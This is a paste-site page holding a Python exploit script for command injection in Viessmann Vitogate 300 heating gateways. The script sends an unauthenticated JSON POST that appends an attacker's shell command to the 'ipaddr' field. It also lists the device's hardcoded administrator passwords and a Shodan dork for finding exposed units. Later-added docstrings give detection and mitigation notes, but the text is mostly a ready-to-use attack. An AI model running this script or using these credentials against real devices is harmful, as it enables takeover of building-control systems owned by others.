FlyFar

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE) - CVE-2023-5702 & CVE-2023-5222

Mar 14th, 2024
  1. #- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.title:'Vitogate 300'
  3. #- Exploit Author: ByteHunter
  4. #- Email: 0xByteHunter@proton.me
  5. #- Version: versions up to 2.1.3.0
  6. #- Tested on: 2.1.1.0
  7. #- CVE : CVE-2023-5702 & CVE-2023-5222
  8.  
  9.  
  10. import argparse
  11. import requests
  12.  
def banner():
    """Print the script's ASCII-art banner to stdout.

    The banner only identifies the script (CVE label, product name, author).
    It performs no network activity and returns nothing.
    """
    # A separate local name, so the string does not shadow the function.
    art = """
   ╔═══════════════════════════════════╗
            CVE-2023-5702  
          Vitogate 300 RCE
          Author: ByteHunter      
   ╚═══════════════════════════════════╝
   """

    print(art)
  23.  
  24.  
def send_post_request(target_ip, command, target_port):
    """POST the proof-of-concept JSON request to the device CGI and print the reply.

    What the code shows: ``command`` is placed after ``1;`` in the
    ``params.ipaddr`` field of a ``form-4-7`` / ``put`` request, the
    ``session`` field is sent empty, and the request goes over plain HTTP to
    ``/cgi-bin/vitogate.cgi``. The page describes the result as remote code
    execution on Vitogate 300 versions up to 2.1.3.0 (tested on 2.1.1.0).
    Presumably the CGI passes ``ipaddr`` to a shell unsanitised; that is
    inferred from the payload shape, not visible here.

    Defender notes:
      * Detection: look for POSTs to ``/cgi-bin/vitogate.cgi`` whose JSON
        ``params.ipaddr`` value is not a plain IP address, especially one
        containing ``;`` or other shell metacharacters, and for requests
        with an empty ``session`` value.
      * Mitigation: keep the device's web interface off untrusted networks
        and check the vendor advisory for a fixed firmware release.
      * NOTE(review): the page labels this request CVE-2023-5702; confirm
        the identifier against the vendor advisory or NVD before using it
        for tracking.

    Args:
        target_ip: Host portion of the URL; also sent as the ``Host`` header.
        command: String appended after ``1;`` in the ``ipaddr`` parameter.
        target_port: Port portion of the URL.

    Returns:
        None. The response body, or the failing status code, is printed.
    """
    endpoint = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"

    body = {
        "method": "put",
        "form": "form-4-7",
        "session": "",  # sent empty: the request carries no session token
        "params": {
            "ipaddr": f"1;{command}",
        },
    }

    # NOTE(review): this length comes from the Python repr of the dict, not
    # from the JSON that is actually sent; requests normally derives
    # Content-Length from the serialised body, so confirm whether this
    # header has any effect.
    request_headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(body))),
        "Content-Type": "application/json",
    }

    reply = requests.post(endpoint, json=body, headers=request_headers)

    # Anything other than HTTP 200 is reported as a failure.
    if reply.status_code != 200:
        print(f"Request failed! status code: {reply.status_code}")
        return

    print("Result:")
    print(reply.text)
  51.  
def main():
    """Parse the command line, then list the credentials or send the request.

    With ``--creds`` the function prints the two account/password pairs that
    the page describes as hardcoded administrative credentials and does
    nothing else. Otherwise it requires both ``--target`` and ``--command``
    and passes them, with ``--port`` (default ``"80"``, kept as a string), to
    ``send_post_request``.

    Defender notes: if these accounts really are hardcoded in the firmware,
    as the page states, an operator cannot rotate them. Treat any login that
    uses them as suspect, and rely on network isolation and a vendor firmware
    update rather than a password change.
    """
    cli = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    cli.add_argument("--target", required=False, help="Target IP address")
    cli.add_argument("--port", required=False, help="Target port", default="80")
    cli.add_argument("--command", required=False, help="Command")
    cli.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    opts = cli.parse_args()

    # --creds takes precedence over every other option.
    if opts.creds:
        for line in (
            "Vitogate 300 hardcoded administrative accounts credentials",
            "Username: vitomaster, Password: viessmann1917",
            "Username: vitogate, Password: viessmann",
        ):
            print(line)
        return

    # argparse marks both options as optional, so the pairing is enforced here.
    if not opts.target or not opts.command:
        print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
        return

    send_post_request(opts.target, opts.command, opts.port)
  75.  
# Script entry point: print the banner first, then run the CLI.
if __name__ == "__main__":
    for step in (banner, main):
        step()
  79.            